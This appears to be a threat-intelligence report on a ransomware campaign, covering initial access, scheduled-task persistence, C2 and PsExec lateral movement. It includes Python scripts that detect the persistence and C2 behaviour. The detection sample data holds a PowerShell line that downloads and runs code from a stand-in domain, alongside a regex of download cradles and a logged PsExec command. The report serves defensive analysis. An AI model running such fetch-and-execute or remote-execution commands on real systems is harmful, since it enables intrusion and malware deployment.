In-Depth Analysis of a Targeted Ransomware Attack Exploiting Vulnerable Web Applications

Nina Kovacs — Exploit Research Analyst

Key Takeaways

  • Ransomware operators utilized a combination of web application vulnerabilities and phishing techniques for initial access.
  • Persistence was achieved through a scheduled task that executed the ransomware payload upon startup.
  • Command and control (C2) communication used HTTP requests, with the traffic obfuscated to evade detection.

Executive Summary

During our investigation of a recently identified ransomware deployment, we observed a sophisticated attack chain that began with the exploitation of web application vulnerabilities, specifically SQL injection and remote file inclusion (RFI). The threat actor executed a well-planned strategy, targeting environments with weak security postures and coupling the exploitation with phishing emails aimed at penetrating further into the network. Our analysis revealed the use of a custom-built ransomware loader, followed by persistence mechanisms and lateral movement techniques indicative of advanced threat actor capabilities.

Initial Access

Initial access relied on a two-pronged approach. First, our examination of the phishing emails revealed that the actor leveraged social engineering, crafting seemingly legitimate communications that carried malicious attachments. Concurrently, we identified the exploitation of known vulnerabilities in web applications hosted by the victim organization. Specifically, a vulnerable plugin in a content management system allowed the actor to perform a successful **SQL Injection** attack, which led to the retrieval of administrative credentials.

Execution & Persistence

The payload, referred to internally as **DarkEncrypt**, was deployed through a PowerShell script embedded in a malicious PDF file. Once executed, the script downloaded the full ransomware binary from an actor-controlled server. Our analysis highlighted the actor's use of **Task Scheduler** on Windows systems to maintain persistence. The malicious task, found at `C:\Windows\System32\Tasks\DarkEncryptTask`, was configured to launch the ransomware every time the system booted, ensuring that the malware was reactivated after any potential disruption.
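The persistence artifact above is an XML task definition on disk, so a responder can triage every file under the Tasks directory without running the task. The following is an added example, not code from the original report: it parses a Task Scheduler 2.0 definition, pulls out the trigger type, the executable and the account it runs as, and scores the combination the report describes (boot trigger, SYSTEM, executable outside trusted system directories). The task XML samples, the trusted-directory list and the scoring thresholds are constructed assumptions, not recovered artifacts.

```python
"""Triage on-disk Task Scheduler definitions for boot-time persistence indicators."""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Task Scheduler 2.0 XML namespace used by definitions under C:\Windows\System32\Tasks.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumption: only executables under these directories are expected for a boot task.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed sample modelled on the report's DarkEncryptTask (not a recovered artifact).
SUSPECT_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <BootTrigger><Enabled>true</Enabled></BootTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\Users\Public\svchost_update.exe</Command><Arguments>-silent</Arguments></Exec>
  </Actions>
</Task>"""

# Constructed benign control: a boot task running as SYSTEM from System32.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Windows\System32\sihclient.exe</Command></Exec></Actions>
</Task>"""


def _text(root, path):
    """Return stripped element text for a namespaced path, or '' when absent."""
    el = root.find(path, NS)
    return el.text.strip() if el is not None and el.text else ""


def triage_task(xml_text):
    """Extract trigger/command/principal from one definition and score it.

    Scoring (assumed thresholds): boot/logon trigger +1, runs as SYSTEM +1,
    executable outside trusted directories +2; suspicious when score >= 3.
    """
    root = ET.fromstring(xml_text)
    trig = root.find("t:Triggers", NS)
    triggers = [] if trig is None else [c.tag.rsplit("}", 1)[-1] for c in trig]
    command = _text(root, "t:Actions/t:Exec/t:Command")
    user = _text(root, "t:Principals/t:Principal/t:UserId")

    findings, score = [], 0
    if any(t in ("BootTrigger", "LogonTrigger") for t in triggers):
        findings.append("launches at boot or logon")
        score += 1
    if user == "S-1-5-18":  # well-known SID for LocalSystem
        findings.append("runs as SYSTEM")
        score += 1
    if command and not command.lower().startswith(TRUSTED_DIRS):
        findings.append(f"executable outside trusted directories: {command}")
        score += 2
    return {"triggers": triggers, "command": command, "user": user,
            "findings": findings, "suspicious": score >= 3}


def triage_directory(tasks_dir):
    """Run triage_task over every file under a Tasks directory (files are UTF-16 XML)."""
    results = {}
    for p in Path(tasks_dir).rglob("*"):
        if not p.is_file():
            continue
        try:
            text = p.read_text(encoding="utf-16")
            text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)  # drop declaration before parsing str
            results[str(p)] = triage_task(text)
        except (ET.ParseError, UnicodeError):
            continue  # not a task definition; skip
    return results


if __name__ == "__main__":
    for name, xml_text in (("suspect", SUSPECT_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(name, triage_task(xml_text))
```

On a live system, `triage_directory(r"C:\Windows\System32\Tasks")` returns one record per definition; only entries with `suspicious` set need an analyst's eye, which is what keeps the hundreds of legitimate boot tasks from drowning out a single entry like the one described above.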

Command and Control

The command and control (C2) infrastructure utilized by the actors was sophisticated, characterized by the use of randomized subdomains to evade detection. Our analysis indicated that **HTTP** was the primary protocol employed for C2 communications, with beacons sent every ten minutes to a domain resembling a legitimate service. By analyzing network traffic, we identified encrypted payloads being transmitted, which employed custom obfuscation methods to obscure their true purpose. The C2 server responded with dynamic instructions for the ransomware, including additional modules that could be pulled down to facilitate lateral movement.

Lateral Movement & Discovery

Once inside the victim's network, the actor conducted lateral movement using **Windows Management Instrumentation (WMI)** and **PsExec**. We observed multiple instances of the command `psexec.exe \\targetmachine -u admin -p password cmd` within the network logs, indicating attempts to deploy the ransomware across several systems. Furthermore, the malware was designed to perform network scans, allowing it to identify additional targets within the environment. The reconnaissance phase revealed that the actor was proficient in identifying high-value assets, including file servers and databases, to encrypt during the attack.

Impact & Objectives

The primary objective of this ransomware operation was financial profit through data encryption and subsequent ransom demands. Our analysis revealed that at least 90% of the files on targeted machines were encrypted. The ransomware used a strong encryption algorithm, RSA-2048, further complicating recovery efforts without the decryption key. Additionally, we noted that the actor deployed a secondary information stealer component during the attack, which aimed to exfiltrate proprietary data. This dual approach not only increased the potential ransom income but also heightened pressure on the victims to comply with the ransom demands.

MITRE ATT&CK Mapping

  • T1190 – Exploit Public-Facing Application: The attacker exploited vulnerabilities in web applications to gain initial access.
  • T1059 – Command-Line Interface: PowerShell scripts were used for execution and deployment of the ransomware.
  • T1071.001 – Application Layer Protocol: Web Protocols: C2 communications utilized HTTP for encrypted messages.
  • T1021.002 – Remote Services: SMB/Windows Admin Shares: Lateral movement used **PsExec** over SMB admin shares.

Detection Opportunities

  • Monitor for unusual Task Scheduler activity, particularly suspicious task names indicative of ransomware persistence.
  • Implement detection for anomalous PowerShell command execution that includes unexpected downloads from non-whitelisted domains.
  • Utilize network monitoring tools to detect unusual HTTP traffic patterns indicative of C2 communications.
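The three opportunities above map to three data sources: Security event 4698 (scheduled task created), PowerShell 4104 script-block text, and web proxy records. The following is an added example, not code from the original report, showing one detector per opportunity run over constructed log lines. The task baseline, the download allowlist, the `cdn-static-update.example.net` domain, the beacon thresholds and the simplified "parent domain = last three labels" rule are all assumptions for the sake of the example; the beacon detector keys on the report's observations (fixed ten-minute interval, many randomized subdomains of one parent domain).

```python
"""Detection logic for the three detection opportunities, over constructed log records."""
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Assumption: baseline and allowlist come from the organization's own inventory.
TASK_BASELINE = {"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
                 "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start"}
DOWNLOAD_ALLOWLIST = {"download.microsoft.com", "updates.example.internal"}

# Common PowerShell download cradles and a permissive URL matcher.
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|DownloadString|DownloadFile|Start-BitsTransfer)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"`)]+", re.I)

# Constructed Security log events (4698 = task created, 4702 = task updated).
TASK_EVENTS = [
    {"EventID": 4698, "Host": "WS01", "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag"},
    {"EventID": 4698, "Host": "WS01", "TaskName": "\\DarkEncryptTask"},
    {"EventID": 4702, "Host": "WS02", "TaskName": "\\DarkEncryptTask"},
]
# Constructed PowerShell 4104 script-block texts.
SCRIPT_BLOCKS = [
    {"Host": "WS01", "Text": "Invoke-WebRequest -Uri https://download.microsoft.com/tools/agent.msi -OutFile agent.msi"},
    {"Host": "WS01", "Text": "IEX (New-Object Net.WebClient).DownloadString('http://cdn-static-update.example.net/x')"},
    {"Host": "WS02", "Text": "Get-ChildItem C:\\Users | Measure-Object"},
]
# Constructed proxy records (source host, ISO timestamp, URL): six ten-minute beacons
# to randomized subdomains, plus ordinary browsing that must not be flagged.
PROXY = [("WS01", f"2024-01-01T00:{m:02d}:00", f"http://{sub}.cdn-static-update.example.net/api")
         for m, sub in ((0, "a1f3"), (10, "9c2e"), (20, "77bd"), (30, "e0aa"), (40, "5d19"), (50, "c4c4"))] + [
    ("WS01", "2024-01-01T00:03:00", "https://download.microsoft.com/tools/agent.msi"),
    ("WS02", "2024-01-01T00:07:00", "https://intranet.example.internal/home"),
    ("WS02", "2024-01-01T00:29:00", "https://intranet.example.internal/home"),
]


def suspicious_task_creations(events):
    """Opportunity 1: newly created tasks whose names are not in the baseline."""
    return [(e["Host"], e["TaskName"]) for e in events
            if e["EventID"] == 4698 and e["TaskName"] not in TASK_BASELINE]


def suspicious_downloads(blocks):
    """Opportunity 2: a download cradle fetching from a host outside the allowlist."""
    hits = []
    for b in blocks:
        if not DOWNLOAD_CRADLE.search(b["Text"]):
            continue
        for url in URL_RE.findall(b["Text"]):
            host = (urlparse(url).hostname or "").lower()
            if host and host not in DOWNLOAD_ALLOWLIST:
                hits.append((b["Host"], host))
    return hits


def parent_domain(host, levels=3):
    """Simplified grouping key: keep the last `levels` labels (assumption, not a PSL lookup)."""
    parts = host.lower().split(".")
    return ".".join(parts[-levels:]) if len(parts) > levels else host.lower()


def beacon_candidates(records, min_requests=5, max_cv=0.1, min_subdomains=3):
    """Opportunity 3: per (source, parent domain), evenly spaced requests spread over many subdomains.

    max_cv is the coefficient of variation of the inter-request gaps; 0.1 catches fixed-interval
    beacons like the report's, and should be loosened for implants that add jitter.
    """
    groups = defaultdict(list)
    for src, ts, url in records:
        host = (urlparse(url).hostname or "").lower()
        groups[(src, parent_domain(host))].append((datetime.fromisoformat(ts), host))
    out = []
    for (src, domain), items in groups.items():
        if len(items) < min_requests:
            continue
        items.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(items, items[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        subdomains = {h for _, h in items}
        if cv <= max_cv and len(subdomains) >= min_subdomains:
            out.append({"src": src, "domain": domain,
                        "interval_s": round(mean), "subdomains": len(subdomains)})
    return out


if __name__ == "__main__":
    print(suspicious_task_creations(TASK_EVENTS))
    print(suspicious_downloads(SCRIPT_BLOCKS))
    print(beacon_candidates(PROXY))
```

Each detector returns structured hits rather than printing, so the same functions can sit behind a SIEM scheduled search; the 4702 event and the allowlisted Microsoft download are included in the sample data precisely so that the output shows what each rule does not fire on.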

Analyst Notes

This ransomware attack exemplifies the importance of maintaining secure web applications and robust email phishing defenses. Organizations should regularly conduct vulnerability assessments and employee training to mitigate the risk from similar attacks. Furthermore, we recommend deploying endpoint detection and response (EDR) tools capable of integrating with existing SIEM solutions to provide a holistic view of threats and enhanced attribution capabilities.
